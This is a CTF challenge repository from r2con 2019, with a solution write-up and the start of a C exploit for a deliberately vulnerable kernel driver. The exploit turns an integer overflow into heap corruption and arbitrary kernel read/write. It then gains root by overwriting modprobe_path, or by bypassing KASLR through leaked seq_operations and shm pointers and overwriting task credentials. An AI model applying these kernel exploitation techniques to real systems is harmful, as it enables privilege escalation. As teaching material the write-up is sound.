├── README.md
├── challenge
    ├── Readme.md
    ├── initramfs
    ├── kernel
    └── run.sh
├── solution
    ├── README.md
    ├── exploit_kaslr_cred.c
    ├── exploit_modprobe_path.c
    ├── images
    │   ├── corrupted_ptr.png
    │   ├── data_sent.png
    │   ├── normal_alloc.png
    │   ├── ovf.png
    │   └── setup.png
    ├── pwn.sh
    └── socks.h
└── source
    ├── Makefile
    ├── socks.c
    └── socks.h


/README.md:
--------------------------------------------------------------------------------
 1 | # Kernel pwnable for r2con 2019 CTF 
 2 | 
 3 | This repository contains the challenge I contributed the r2con 2019 CTF. The 
 4 | challenge was not solved during the CTF, so I decided to also host it on 
 5 | github.
 6 | 
 7 | The repository contains the following folders:
 8 | 
 9 | * `challenge/` contains the files provided to the CTF participants. This is 
10 | the only directory with contents at the moment.
11 | 
12 | * `source/`: contains the source code of the `socks.ko` module running in the 
13 | challenge VM. By mistake I also left a half-finished v2 module inside the VM
14 | filesystem that was not relevant to the challenge.
15 | 
16 | * `solution/`: contains a write-up of my solution as well as two differnt 
17 | exploits to be used for reference purposes.


--------------------------------------------------------------------------------
/challenge/Readme.md:
--------------------------------------------------------------------------------
 1 | This folder contains the challenge as provided to the CTF participants,
 2 | plus this README file. The challenge server is down, but you can still 
 3 | try to write the exploit locally against the VM provided here (see 
 4 | `run.sh`).
 5 | 
 6 | The provided challenge description was as follows:
 7 | 
 8 | ```
 9 | Pull up your socks
10 | 
11 | Be careful with moths, can make small holes in your socks.
12 | 
13 | r2 has new socks, and they are in kernel land! Pwn the kernel
14 | in this challenge and read the flag off /flag.txt
15 | 
16 | nc xxx.xxx.xxx.xxx 31337
17 | ```
18 | 
19 | And the following two hints were published during the CTF in order:
20 | 
21 | 
22 | ```
23 | Take a look at how socks are allocated
24 | ```
25 | 
26 | ```
27 | Once you got arbitrary write, you can use the modprobe_path trick, similar to: https://vishnudevtj.github.io/notes/1118daysober
28 | ```
29 | 
30 | 
31 | 


--------------------------------------------------------------------------------
/challenge/initramfs:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/esanfelix/r2con2019-ctf-kernel/8f8fa1e9f84d52daabc63275c57c8436a7c56354/challenge/initramfs


--------------------------------------------------------------------------------
/challenge/kernel:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/esanfelix/r2con2019-ctf-kernel/8f8fa1e9f84d52daabc63275c57c8436a7c56354/challenge/kernel


--------------------------------------------------------------------------------
/challenge/run.sh:
--------------------------------------------------------------------------------
1 | #!/bin/sh
2 | 
3 | qemu-system-x86_64 -cpu qemu64,-smep,-smap \
4 | 	-m 64 \
5 | 	-kernel ./kernel \
6 | 	-nographic \
7 | 	-append "console=ttyS0 quiet" -initrd ./initramfs \
8 | 	-monitor /dev/null
9 | 


--------------------------------------------------------------------------------
/solution/README.md:
--------------------------------------------------------------------------------
  1 | # r2con 2019 kernel exploitation challenge solution
  2 | 
  3 | This is the reference solution to the challenge, exploiting an intended integer
  4 | overflow bug. It is very well possible that other exploitable bugs exist.
  5 | 
  6 | Note that the write-up uses the source code as a reference, but the original 
  7 | challenge only provided the module binary.
  8 | 
  9 | ## Driver functionality: analysis
 10 | 
 11 | The `socks.ko` driver running inside the provided VM exposes a device through 
 12 | `/dev/socks`. The exposed device allows tasks to communicate with each other by 
 13 | means of "sockets", each of which is defined by an open `/dev/socks` file 
 14 | descriptor.
 15 | 
 16 | When a file descriptor is created, the `socks_open` function creates a new 
 17 | socket as follows:
 18 | 
 19 | ```c
 20 | static int socks_open(struct inode *inode, struct file *file)
 21 | {
 22 | 
 23 |     sock_t *sock = kzalloc(sizeof(*sock), GFP_KERNEL);
 24 |     
 25 |     if (!sock)
 26 |         return -ENOMEM;
 27 | 
 28 |     /*
 29 |      * private_data is used to keep driver-specific data. The 
 30 |      * kernel does not touch this field at all, so drivers can
 31 |      * place their data here and get it out e.g. in ioctl.
 32 |      */
 33 | 
 34 |     file->private_data = sock;
 35 | 
 36 |     /* Initialize empty listening_list head */
 37 |     INIT_LIST_HEAD(&sock->listening_list);
 38 |     pr_info("New socks successfully created!\n");
 39 | 
 40 |     return 0;
 41 | }
 42 | ```
 43 | 
 44 | As can be seen, a `sock_t` structure is created and stored as `private_data`, 
 45 | which is then accessible through the `struct file *` provided to the different 
 46 | file operations functions.
 47 | 
 48 | The following file_operations are defined:
 49 | 
 50 | ```c
 51 | static const struct file_operations socks_fops = {
 52 |     .owner			= THIS_MODULE,
 53 |     .open			= socks_open,
 54 |     .release		= socks_close,
 55 |     .llseek 		= no_llseek,
 56 |     .unlocked_ioctl = socks_ioctl,
 57 | };
 58 | ```
 59 | 
 60 | Of these, the most interesting one is `socks_ioctl` since it allows us to 
 61 | interact with the created socket. `socks_close` will only be used after no more 
 62 | references to the `struct file *` are left, which could also be of interest.
 63 | 
 64 | The `socks_ioctl` function implements 4 actions on the socket:
 65 | 
 66 | * `IOCTL_SOCKS_INIT` initializes the socket. This is required before any other 
 67 | code can be used.
 68 | 
 69 | * `IOCTL_SOCKS_LISTEN` puts the socket to listen under a globally unique name. 
 70 | Requires having initialized the socket.
 71 | 
 72 | * `IOCTL_SOCKS_CONNECT` connects the current socket to a listening socket, 
 73 | identified by its name. Requires having initialized the socket.
 74 | 
 75 | * `IOCTL_SOCKS_SEND` and `IOCTL_SOCKS_RECV` allow sending data through the socket
 76 | and receiving it, respectively. Require a connected socket.
 77 | 
 78 | Each of these ioctl codes is implemented in a separate function in the source 
 79 | code, but they get inlined into `socks_ioctl` in the compiled version.
 80 | 
 81 | ### Socket initialization - intended vulnerability
 82 | 
 83 | When initializing a socket, the ioctl argument is interpreted as an `unsigned 
 84 | long` and represents a buffer size:
 85 | 
 86 | ```c
 87 | static long socks_ioctl_init(sock_t *sock, unsigned long arg) {
 88 | [1] uint64_t size = arg + sizeof(sock_buf_t);
 89 |     sock_buf_t *buf = NULL;
 90 |     int err = 0;
 91 | 
 92 |     // Sanity check without locking the buffer.
 93 | [2] if (size > MAX_SIZE) {
 94 |         return -EINVAL;
 95 |     }
 96 | 
 97 |     // First off: lock the buffer
 98 | 
 99 |     spin_lock(&sock->lock);
100 | 
101 |     if (sock->state != UNINITIALIZED) {
102 |         err = -EINVAL;
103 |         goto out_unlock;
104 |     }
105 | 
106 | [3] buf = kzalloc(size, GFP_KERNEL);
107 |     printk(KERN_ALERT "Allocated ptr %llx\n", buf);
108 | 
109 |     if (IS_ERR_OR_NULL(buf)) {
110 |         err = (buf ? PTR_ERR(buf) : -ENOMEM);
111 |         goto out_unlock;
112 |     }
113 | 
114 |     sock->buf = buf;
115 |     sock->buf->size = size - sizeof(sock_buf_t);
116 |     sock->buf->write_index = 0;
117 |     sock->buf->read_index = 0;
118 | [4] sock->buf->buffer = (unsigned char *)buf + sizeof(sock_buf_t); // Buffer is inline
119 | 
120 |     sock->state = INITIALIZED;
121 | 
122 |     pr_info("Initialized socket with buffer size %lx\n", sock->buf->size);
123 | 
124 | 
125 | out_unlock:
126 |     spin_unlock(&sock->lock);
127 |     return err;
128 | }
129 | ```
130 | 
131 | At `[1]` the size of a structure `sock_buf_t` is added to the requested size,
132 | potentially overflowing. At `[2]` a check is performed, but the damage is 
133 | already done.
134 | 
135 | Next, at `[3]` a buffer of the computed size is allocated and later 
136 | initialized. The allocated buffer contains a header of type `sock_buf_t` and an 
137 | inline buffer of the requested size, with the `buffer` pointer of `sock_buf_t` 
138 | pointing to the inlined space.
139 | 
140 | Under normal circumstances, the `buffer` field of a `sock_buf_t` points into a 
141 | `size`-byte long buffer that follows it on the heap, as shown here:
142 | 
143 | ![Socket buffer with a regular allocation](images/normal_alloc.png "Socket buffer with a regular allocation")
144 | 
145 | Now, if we provide an `arg` value bigger than `ULONG_MAX-0x20` the addition at 
146 | `[1]` will overflow and the buffer field will point out of bounds. If we use a 
147 | value of -1 (or `ULONG_MAX`) the requested size will be 0x1F and the structure 
148 | allocated in the `kmalloc-32` slab. In that case, the `buffer` field will point 
149 | to the next heap object, as illustrated here:
150 | 
151 | ![Socket buffer after triggering an integer overflow](images/ovf.png "Socket buffer after triggering an integer overflow")
152 | 
153 | Therefore, any uses of this field to access memory will result in out-of-bounds 
154 | reads or writes. 
155 | 
156 | ### Listening and connecting
157 | 
158 | When we try to listen on a socket, the code checks that the state is valid (i.e.
159 | INITIALIZED) and that there are no name clashes with other listening sockets:
160 | 
161 | ```c
162 |     /*
163 |      * Not allowed to listen unless we are in initialized
164 |      * state.
165 |      */
166 |     if (sock->state != INITIALIZED) {
167 |         err = -EINVAL;
168 |         goto out_unlock;
169 |     }
170 | 
171 |     /* Make sure there is no other socket with this name */
172 |     spin_lock(&sock_device.lock);
173 |     if (socks_find_listening_device(param->name)) {
174 |         err = -EINVAL;
175 |         pr_err("There's already a socket with that name");
176 |         spin_unlock(&sock_device.lock);
177 |         goto out_unlock;
178 |     }
179 |  
180 | ```
181 | 
182 | If all this is good, the socket gets added to a global list of listening sockets
183 | within the sock_device structure and sets its state to LISTENING:
184 | 
185 | ```c
186 |     /* Alright, nobody else on that list. Add to the list and set to listening */
187 |     strcpy(sock->name, param->name);
188 |     sock->state = LISTENING;
189 |     list_add(&sock->listening_list, &sock_device.listening);
190 |     pr_info("Socket is now listening at %s\n", param->name);
191 |     spin_unlock(&sock_device.lock);
192 | ```
193 | 
194 | When a socket tries to connect to a listening socket, the driver does a similar 
195 | state check and then searches for the listening socket. If found, it'll set both
196 | ends to CONNECTED and bind them through the `peer` field in the `sock_t` structure:
197 | 
198 | ```c
199 |     spin_lock(&sock_device.lock);
200 |     if ( (peer = socks_find_listening_device(param->name)) == NULL) {
201 |         pr_err("No socket with that name found");
202 |         err = -EINVAL;
203 |         spin_unlock(&sock_device.lock);
204 |         goto out_unlock;
205 |     }
206 | 
207 |     /* Remove peer from listening list */
208 |     spin_lock(&peer->lock);
209 |     list_del_init(&peer->listening_list);
210 |     spin_unlock(&sock_device.lock);
211 | 
212 |     /* Connect the two sockets */
213 |     sock->state = CONNECTED;
214 |     sock->peer = peer;
215 |     peer->peer = sock;
216 |     peer->state = CONNECTED;
217 | 
218 |     pr_info("Successfully connected to %s\n", param->name);
219 |     spin_unlock(&peer->lock);
220 | ```
221 | 
222 | ### Sending and receiving data
223 | 
224 | Sending and receiving data starts by making sure that the socket state is 
225 | CONNECTED. The data intended for a given socket is stored in its own `sock_buf_t` 
226 | buffer.
227 | 
228 | Thus, when sending data, the code finds the peer socket and makes sure the data 
229 | will fit. If so, it copies the data. When receiving data, the code finds the 
230 | current socket's buffer and tries to fetch data off it.
231 | 
232 | The code is a little convoluted because it implements a (buggy) circular buffer
233 | mechanism. The `write_index` field indicates where data will be written to, 
234 | while the `read_index` field indicates where the first unread byte is available.
235 | 
236 | They both start at 0, and evolve depending on the usage. If `write_index` 
237 | reaches the end of the buffer, it wraps around to zero. And the same occurs with
238 | `read_index`.
239 | 
240 | For example, this is part of the `socks_push` function implementing adding data 
241 | to a buffer:
242 | 
243 | ```c
244 |     /*
245 |      * If data doesn't fit, fail.
246 |      */
247 |     if (sock_buf_left(buf) < size) {
248 |         return -ENOMEM;
249 |     }
250 | 
251 | 
252 |     /* 
253 |      * We can write up to read_index if it's bigger than write_index,
254 |      * or up to end of buffer otherwise.
255 |      */
256 |     size_t max_write_index = (buf->read_index > buf->write_index) ? buf->read_index : buf->size;
257 |     size_t copy1_size = min(size, max_write_index - buf->write_index);
258 |     size_t prev_write_index = buf->write_index;
259 | 
260 |     if (copy_from_user(buf->buffer + buf->write_index, buffer, copy1_size)) {
261 |         return -ENOMEM;
262 |     }
263 | 
264 |     /* Update our write index */
265 |     buf->write_index = (buf->write_index + copy1_size) % buf->size;
266 | ```
267 | 
268 | ## Exploitation - reference solution
269 | 
270 | In this section I will provide my initial solution, and in the next one an 
271 | alternative solution that bypasses KASLR as well. If you haven't solved the 
272 | challenge, now would be a good time to give it a try before reading on!
273 | 
274 | ### Available primitives
275 | 
276 | So we have an integer overflow bug that results in a `sock->buf->buffer` pointing 
277 | out of bounds. As we've seen above, if the given socket is connected AND we send 
278 | data to it, the sent data will corrupt adjacent heap memory. This is of course 
279 | very useful :)
280 | 
281 | Furthermore, if we first send data to the buffer (corrupting whatever is behind 
282 | it) but then have the kernel replace it by something else we can also read the 
283 | replaced data back by receiving it through the socket.
284 | 
285 | ### Challenge setup
286 | 
287 | The challenge setup was quite simple, in the sense that the kernel was running 
288 | with almost no mitigations. In particular:
289 | 
290 | * HARDENED_USERCOPY was disabled
291 | * SMEP and SMAP were not available
292 | * KASLR was not compiled in
293 | * /proc/kallsyms was world-readable
294 | * Heap randomization was turned off, as well as other heap hardening options
295 | 
296 | ### Exploitation approach
297 | 
298 | Given the structures and functionality in this module, it is quite simple to 
299 | achieve arbitrary write capabilities. For this, I followed the following 
300 | approach in my reference solution:
301 | 
302 | 1. Create a bunch of sockets of size 0 to fill up the kmalloc-32 slabs
303 | 2. Create 2 more sockets of size -1 and connect them to each other
304 | 3. Send data to the first socket to smash the second socket `sock_buf_t`, 
305 | setting `buffer` to an arbitrary value.
306 | 4. Send data to the second buffer to achieve arbitrary write.
307 | 
308 | For my original solution I chose to overwrite `modprobe_path` since auto-loading 
309 | was enabled and without any filtering. I then had it replaced by the string 
310 | `/home/user/pwn.sh` which contained an executable script with these contents:
311 | 
312 | ```
313 | #!/bin/sh
314 | id > /tmp/pwn3d
315 | cp /flag.txt /home/user/flag.txt
316 | chmod 777 /home/user/flag.txt
317 | ```
318 | 
319 | After this, we can cause the script to be executed by e.g. creating an SCTP 
320 | socket or trying to load an executable file with an invalid format.
321 | 
322 | In order to run the exploit on the target machine, we simply have to compile it 
323 | statically and send it over. The machine was configured with qemu networking on, 
324 | so you could find the host at 10.0.2.2, or in the CTF use any machine with a 
325 | public IP address.
326 | 
327 | As an example, here is a run on my test machine (note this has the actual CTF 
328 | flag, while the VM I provided contains an all-zeroes flag):
329 | 
330 | ```sh
331 | ~ $ cd ; nc 10.0.2.2 1234 > exploit ; chmod +x exploit
332 | ~ $ nc 10.0.2.2 1234 > pwn.sh ; chmod +x pwn.sh
333 | ~ $ ./exploit
334 | [...] 
335 | 
336 | [  224.945090] Initialized socket with buffer size 0
337 | [  224.945510] New socks successfully created!
338 | [  224.945917] Initialized socket with buffer size 0
339 | [  224.946287] New socks successfully created!
340 | [  224.946534] Initialized socket with buffer size 0
341 | [  224.946937] New socks successfully created!
342 | [  224.947368] Initialized socket with buffer size 0
343 | [  224.947970] New socks successfully created!
344 | [  224.948379] New socks successfully created!
345 | [  224.948831] Initialized socket with buffer size ffffffffffffffff
346 | [*] Trying to listen in test_socket
347 | [  224.952268] Length of name: 11
348 | [  224.952476] Searching for socket test_socket
349 | [  224.952845] Socket is now listening at test_socket
350 | [  224.953220] Initialized socket with buffer size 0
351 | [*] Trying to connect to test_socket
352 | [  224.954180] Length of name: 11
353 | [  224.954473] Searching for socket test_socket
354 | [  224.955079] Successfully connected to test_socket
355 | ~ $ cat flag.txt 
356 | r2con{06e6ec5e2653a51e6e383ee4776a6670}
357 | ~ $ cat /tmp/pwn3d 
358 | uid=0(root) gid=0(root)
359 | ~ $ 
360 | ```
361 | 
362 | See `exploit_modprobe_path.c` for this solution. Make sure you also place the 
363 | `pwn.sh` script in `/home/user/` if you test it.
364 | 
365 | ## Exploitation - stable arbitrary read/write and KASLR bypass
366 | 
367 | I was chatting with [@dialluvioso_](https://twitter.com/dialluvioso_) while he tried 
368 | to solve the challenge, and he mentioned he wanted to avoid the `modprobe_path` 
369 | solution and also assume KASLR was on.
370 | 
371 | I hadn't really thought much about it for this challenge, but given the bug 
372 | it is obvious that one can easily get arbitrary read/write by correctly setting
373 | up the `sock_buf_t` structure.
374 | 
375 | However, for bypassing KASLR one needs to know some valid kernel pointer before 
376 | attempting to e.g. find the current task structure and change its credentials.
377 | 
378 | Additionally, if we smash a `sock_buf_t` via a `send` like we did above, the write 
379 | index for the corresponding socket gets incremented as well. For this reason, 
380 | you cannot simply overwrite the `sock_buf_t` over and over by sending additional
381 | data.
382 | 
383 | A very simple solution is to free the buffer and make a new one in its place. If
384 | all goes well, the new `sock_buf_t` will be placed in the hole left behind by 
385 | the old one and we'll be able to smash the buffer again.
386 | 
387 | However, this could also fail if another kernel path reallocates the object 
388 | before us, and we'd be introducing a chance for this to happen for every read or 
389 | write we perform.
390 | 
391 | If we analyze the `socks_push` function, we can see that IF `copy_from_user` 
392 | fails the write index won't be incremented:
393 | 
394 | ```c
395 |     /* 
396 |      * We can write up to read_index if it's bigger than write_index,
397 |      * or up to end of buffer otherwise.
398 |      */
399 |     size_t max_write_index = (buf->read_index > buf->write_index) ? buf->read_index : buf->size;
400 |     size_t copy1_size = min(size, max_write_index - buf->write_index);
401 |     size_t prev_write_index = buf->write_index;
402 | 
403 |     if (copy_from_user(buf->buffer + buf->write_index, buffer, copy1_size)) {
404 |         return -ENOMEM;
405 |     }
406 | 
407 |     /* Update our write index */
408 |     buf->write_index = (buf->write_index + copy1_size) % buf->size;
409 | ```
410 | 
411 | This actually opens a door for us to corrupt the adjacent `sock_buf_t` without 
412 | incrementing the write index as follows:
413 | 
414 | 1. We allocate two pages with `mmap`, at address `X`
415 | 2. We mark the page at `X + 0x1000` as unreadable with `mprotect` and `PROT_NONE`
416 | 3. We write our fake `sock_buf_t` at `X + 0xFE0`, i.e. 0x20 bytes before the 
417 | unreadable page.
418 | 4. We send 0x21 bytes through the buffer starting at `X + 0xFE0`.
419 | 
420 | The `copy_from_user` function will actually copy 0x20 bytes and then generate a 
421 | page fault. This additionally results in calling `memset` to clear the last byte, 
422 | as can be seen here:
423 | 
424 | ```c
425 | unsigned long _copy_from_user(void *to, const void __user *from, unsigned long n)
426 | {
427 | 	unsigned long res = n;
428 | 	might_fault();
429 | 	if (likely(access_ok(VERIFY_READ, from, n))) {
430 | 		kasan_check_write(to, n);
431 | 		res = raw_copy_from_user(to, from, n);
432 | 	}
433 | 	if (unlikely(res)) {
434 | 		memset(to + (n - res), 0, res);
435 | 	}
436 | 	return res;
437 | }
438 | ```
439 | 
440 | Thus, we corrupt 0x20 bytes with controlled data and an additional byte with zero,
441 | and the write_index remains zero. Using this trick we can therefore corrupt the 
442 | adjacent `sock_buf_t` repeatedly and get a stable read/write primitive without 
443 | the need for reallocating anything.
444 | 
445 | The only missing element is a pointer leak. The following idea came up during 
446 | the discussion:
447 | 
448 | 1. Create and connect two sockets. Their buffers should be adjacent to the buffer 
449 | we will use for performing memory corruption, thus we need to use the bug with 
450 | them as well. The last few sockets on the heap now look as follows:
451 | 	
452 | 	![Heap layout after initial setup](images/setup.png "Heap layout after initial setup")
453 | 
454 | 
455 | 2. Send data to the first of these sockets, thus incrementing its `write_index` 
456 | to an arbitrary value. Note that because of the bug we'd be corrupting as many 
457 | bytes out-of-bounds, so I decided to corrupt 0x20 bytes to make sure I only 
458 | overwrite one `sock_buf_t` and not further. This would leave us with the 
459 | following heap layout:
460 | 
461 | 	![Heap layout after sending data](images/data_sent.png "Heap layout after sending data")
462 | 
463 | 
464 | 3. Set the last byte of `sock_buf_t->buffer` to 0x00. This will most likely 
465 | misalign the value and make it point to an earlier `sock_buf_t` as shown in the 
466 | figure below:
467 | 
468 | 	![Heap layout after corrupting the buffer pointer](images/corrupted_ptr.png "Heap layout after corrupting the buffer pointer")
469 | 
470 | 	Note that this is an example but there are no guarantees that the `sock_buf_t`
471 | 	the buffer points to after setting its LSB to 0x00 is exactly 2 buffers before 
472 | 	our corrupted `sock_buf_t`.
473 | 
474 | 4. Read the data from the buffer through `socks_recv`. We should now learn the 
475 | contents of the `sock_buf_t`, including a pointer to itself.
476 | 
477 | From here, we learn the address of a kmalloc-32 object close to the overflown 
478 | buffer (at most 0xe0 bytes earlier). We can now use the arbitrary read to find 
479 | exactly where the overflown buffer was by searching for the data written in step 
480 | 2 above.
481 | 
482 | This is how I do that in my exploit:
483 | 
484 | ```c
485 | uint64_t leak(void) {
486 |   int ret;
487 |   *((uint64_t *) (ptr + 0xff8)) = 8;
488 | 
489 |   /* Make sure there are 0x20 bytes available to be read */
490 |   char buf[0x20] = { [0 ... 0x1f] = 'A' };
491 |   ret = sock_send(fds[3], buf, 0x20);
492 |   
493 |   /* Smash `size` and set LSB of buffer to 0x00 */
494 |   ret = sock_send(fds[0], ptr + 0xff8, 9);
495 | 
496 |   /* Read 0x20 bytes from modified buffer pointer */
497 |   ret = sock_recv(fds[2], buf, 0x20);
498 |   return *((uint64_t *) (buf + 8));;
499 | }
500 | 
501 | int main(int argc, char* argv[argc+1]) {
502 | 
503 | 	// ...
504 | 
505 | 	uint64_t addr = leak();
506 | 
507 | 	uint64_t fds3 = 0;
508 | 
509 | 	for(int i=0; i < 256; i+= 8) {
510 | 		uint64_t data = read64(addr + i);
511 | 		if (data == 0x4141414141414100) {
512 | 			/* found fds[3] ! */
513 | 			fds3 = addr + i;
514 | 		}
515 | 	}
516 | 
517 | 	if (!fds3) {
518 | 		printf("[!] Failed to find fds[3]\n");
519 | 		exit(0);
520 | 	}
521 | 
522 | 	printf("[*] fds[3] sock_buf_t at %lx\n", fds3);
523 | 	uint64_t target = fds3 - 4*0x20;
524 | 
525 | ```
526 | 
527 | 
528 | Once we know this, we can free an arbitrary `sock_buf_t` and replace it with 
529 | another kmalloc-32 object containing pointers to the kernel .text or .data 
530 | sections in order to fully bypass KASLR.
531 | 
532 | After a small search, I found the following two options:
533 | 
534 | 1. The `shmat` syscall allocates a structure of type `struct shm_file_data` using 
535 | `kzalloc`:
536 | 
537 | 	```c
538 | 	struct shm_file_data {
539 | 		int id;
540 | 		struct ipc_namespace *ns;
541 | 		struct file *file;
542 | 		const struct vm_operations_struct *vm_ops;
543 | 	};
544 | 	```
545 | 
546 | 	Both the `ns` and the `vm_ops` fields point to kernel .data. Thus all we 
547 | 	need to do is to create a shared memory area with `shmget` at the beginning 
548 | 	of the exploit and map it with `shmat` after we've leaked the kmalloc-32 
549 | 	address.
550 | 
551 | 2. When opening a file using the `seq_file` facility, `single_open` allocates a 
552 | `struct seq_operations` with `kmalloc`. This structure contains a 4 function 
553 | pointers as shown here: 
554 | 
555 | 	```c
556 | 	struct seq_operations {
557 | 		void * (*start) (struct seq_file *m, loff_t *pos);
558 | 		void (*stop) (struct seq_file *m, void *v);
559 | 		void * (*next) (struct seq_file *m, void *v, loff_t *pos);
560 | 		int (*show) (struct seq_file *m, void *v);
561 | 	};
562 | 	```
563 | 
564 | 	All we need to do in this case is open a file descriptor to any file that 
565 | 	uses `single_open`, for example `/proc/self/stat`.
566 | 
567 | After we leaked the kernel base address, we can just find `init_task` by adding 
568 | its offset. Then we can iterate the task structure and give ourselves root.
569 | 
570 | I've implemented this solution in `exploit_kaslr_cred.c`. By default the code 
571 | uses the `single_open` approach to find the kernel base, but can be compiled 
572 | with `-DUSE_SHMEM_LEAK` to use the shmem-based approach. 
573 | 
574 | When running the exploit you should see something like this:
575 | 
576 | ```sh
577 | $ ./test
578 | 
579 | ...
580 | 
581 | [*] fds[3] sock_buf_t at ffff888002f9e520
582 | [*] Kernel base: 0xffffffff81000000
583 | [*] We are: 0
584 | /bin/sh: can't access tty; job control turned off
585 | /home/user # id
586 | uid=0(root) gid=0(root)
587 | /home/user # cat /flag.txt 
588 | r2con{06e6ec5e2653a51e6e383ee4776a6670}
589 | /home/user # 
590 | ```
591 | 
592 | 


--------------------------------------------------------------------------------
/solution/exploit_kaslr_cred.c:
--------------------------------------------------------------------------------
  1 | #define _GNU_SOURCE
  2 | #include <fcntl.h>
  3 | #include <stdio.h>
  4 | #include <stdlib.h>
  5 | #include <limits.h>
  6 | #include <unistd.h>
  7 | #include <stdint.h>
  8 | #include <sys/stat.h>
  9 | #include <sys/mman.h>
 10 | #include <sys/syscall.h>
 11 | #include <string.h>
 12 | #include <errno.h>
 13 | #include  <sys/types.h>
 14 | #include  <sys/ipc.h>
 15 | #include  <sys/shm.h>
 16 | #include  <stdio.h>
 17 | #include <sys/prctl.h>
 18 | 
 19 | #include "socks.h"
 20 | 
 21 | 
 22 | /*
 23 |  * Uncomment this define to use the shmem leak instead of the 
 24 |  * seq_file one. You can also use -DUSE_SHMEM_LEAK when compiling
 25 |  * the code instead.
 26 |  */
 27 | 
 28 | // #define USE_SHMEM_LEAK
 29 | 
 30 | typedef struct sock_buf {
 31 | 	size_t size;
 32 | 	unsigned char *buffer;
 33 | 	size_t read_index;
 34 | 	size_t write_index;
 35 | 	// Inline buffer!
 36 | } sock_buf_t;
 37 | 
 38 | static char *ptr = NULL;
 39 | int spray_fd[1000];
 40 | int fds[4];
 41 | 
 42 | int sock_init(int fd, size_t size) {
 43 | 	return ioctl(fd, IOCTL_SOCKS_INIT, size);
 44 | }
 45 | 
 46 | int sock_listen(int fd, char *name) {
 47 | 	struct sock_name_param param;
 48 | 	memset(&param, 0, sizeof(param));
 49 | 	strncpy(param.name, name, sizeof(param.name) -1);
 50 | 	printf("[*] Trying to listen in %s\n", param.name);
 51 | 
 52 | 	return ioctl(fd, IOCTL_SOCKS_LISTEN, &param);
 53 | }
 54 | 
 55 | int sock_connect(int fd, char *name) {
 56 | 	struct sock_name_param param;
 57 | 	memset(&param, 0, sizeof(param));
 58 | 	strncpy(param.name, name, sizeof(param.name) -1);
 59 | 	printf("[*] Trying to connect to %s\n", param.name);
 60 | 	return ioctl(fd, IOCTL_SOCKS_CONNECT, &param);
 61 | }
 62 | 
 63 | int sock_send(int fd, void *buffer, size_t size) {
 64 | 	struct sock_buffer_param param = { .size = size, .buffer = buffer};
 65 | 	return ioctl(fd, IOCTL_SOCKS_SEND, &param);
 66 | }
 67 | 
 68 | int sock_recv(int fd, void *buffer, size_t size) {
 69 | 	struct sock_buffer_param param = { .size = size, .buffer = buffer};
 70 | 	return ioctl(fd, IOCTL_SOCKS_RECV, &param);
 71 | }
 72 | 
 73 | /*
 74 |  * init_task offset from the base of the kernel. Obtained by subtracting 
 75 |  * init_task - _stext, which can be read off /proc/kallsyms.
 76 |  */
 77 | 
 78 | #define INIT_TASK 0x100f740L
 79 | 
 80 | /* shm_vm_ops  offset from the kernel base. */
 81 | #define SHMEM_VM_OPS 0x1056b00
 82 | 
 83 | /* single_start  offset from the kernel base. */
 84 | #define SINGLE_START 0x1c1fd0
 85 | 
 86 | /*
 87 |  * Offsets in the task structure. Obtained by dumping a valid cred 
 88 |  * structure and heuristically checking for them.
 89 |  */
 90 | 
 91 | #define COMM 0x570
 92 | #define CRED 0x560
 93 | #define TASKS 0x2c8
 94 | 
 95 | /*
 96 |  * Read function. First forges a sock_buf_t with the 
 97 |  * given addr and 8 bytes available to be read, then 
 98 |  * performs the read.
 99 |  */
100 | 
101 | uint64_t read64(uint64_t addr) {
102 | 	*((uint64_t *) (ptr + 0xfe0)) = 8;
103 | 	*((uint64_t *) (ptr + 0xfe8)) = addr;
104 | 	*((uint64_t *) (ptr + 0xff0)) = 0;
105 | 	*((uint64_t *) (ptr + 0xff8)) = 8;
106 | 
107 | 	uint64_t data;
108 | 	int ret = sock_send(fds[0], ptr + 0xfe0, 0x21);
109 | 	// printf("[*] ioctl returned %d, errno = %d\n", ret, errno);
110 | 	sock_recv(fds[2], (char *) &data, 8);
111 | 
112 | 	return data;
113 | }
114 | 
115 | 
116 | /*
117 |  * Write function. First forges a sock_buf_t with the 
118 |  * given addr and 8 bytes available to be written, then 
119 |  * performs the write.
120 |  */
121 | uint64_t write64(uint64_t addr, uint64_t value) {
122 | 	*((uint64_t *) (ptr + 0xfe0)) = 8;
123 | 	*((uint64_t *) (ptr + 0xfe8)) = addr;
124 | 	*((uint64_t *) (ptr + 0xff0)) = 0;
125 | 	*((uint64_t *) (ptr + 0xff8)) = 0;
126 | 
127 | 	uint64_t data = value;
128 | 	int ret = sock_send(fds[0], ptr + 0xfe0, 0x21);
129 | 
130 | 	sock_send(fds[3], (char *) &data, 8);
131 | 
132 | 	return data;
133 | }
134 | 
135 | /*
136 |  * Initial leak obtained by sending data to a sock_buf_t
137 |  * to setup its `write_index` correctly, then smashing 
138 |  * the LSB of its pointer to read out of bounds.
139 |  * 
140 |  * Returns the address of a sock_buf_t located at the 256-byte
141 |  * aligned address before the fds[2] sock_buf_t.
142 |  */
143 | uint64_t leak(void) {
144 |   int ret;
145 |   *((uint64_t *) (ptr + 0xff8)) = 8;
146 | 
147 |   /* Make sure there are 0x20 bytes available to be read */
148 |   char buf[0x20] = { [0 ... 0x1f] = 'A' };
149 |   ret = sock_send(fds[3], buf, 0x20);
150 |   
151 |   /* Smash `size` and set LSB of buffer to 0x00 */
152 |   ret = sock_send(fds[0], ptr + 0xff8, 9);
153 | 
154 |   /* Read 0x20 bytes from modified buffer pointer */
155 |   ret = sock_recv(fds[2], buf, 0x20);
156 |   return *((uint64_t *) (buf + 8));
157 | }
158 | 
159 | int main(int argc, char* argv[argc+1]) {
160 | 
161 | #ifdef USE_SHMEM_LEAK
162 | 	int       shm_id;
163 | 	key_t     mem_key;
164 | 	int       *shm_ptr;
165 | 
166 | 	shm_id = shmget(mem_key, 4*sizeof(int), IPC_CREAT | 0666);
167 | 	if (shm_id < 0) {
168 | 	     printf("*** shmget error (server) ***\n");
169 | 	     exit(1);
170 | 	}
171 | #endif
172 | 
173 | 
174 | 	for (size_t i = 0; i < 1000; ++i) {
175 | 		int fd = open("/dev/socks", O_RDWR);
176 | 		sock_init(fd, -1);
177 | 		spray_fd[i] = fd;
178 | 	}
179 | 
180 | 	for (size_t i = 0; i < 4; ++i) {
181 | 		fds[i] = open("/dev/socks", O_RDWR);
182 | 		if (fds[i] == -1)
183 | 			perror("open()");
184 | 
185 | 		printf("[+] Intializing socket: %d\n", fds[i]);
186 | 		sock_init(fds[i], ULONG_MAX);
187 | 	}
188 | 	
189 | 	sock_listen(fds[0],  "socks");
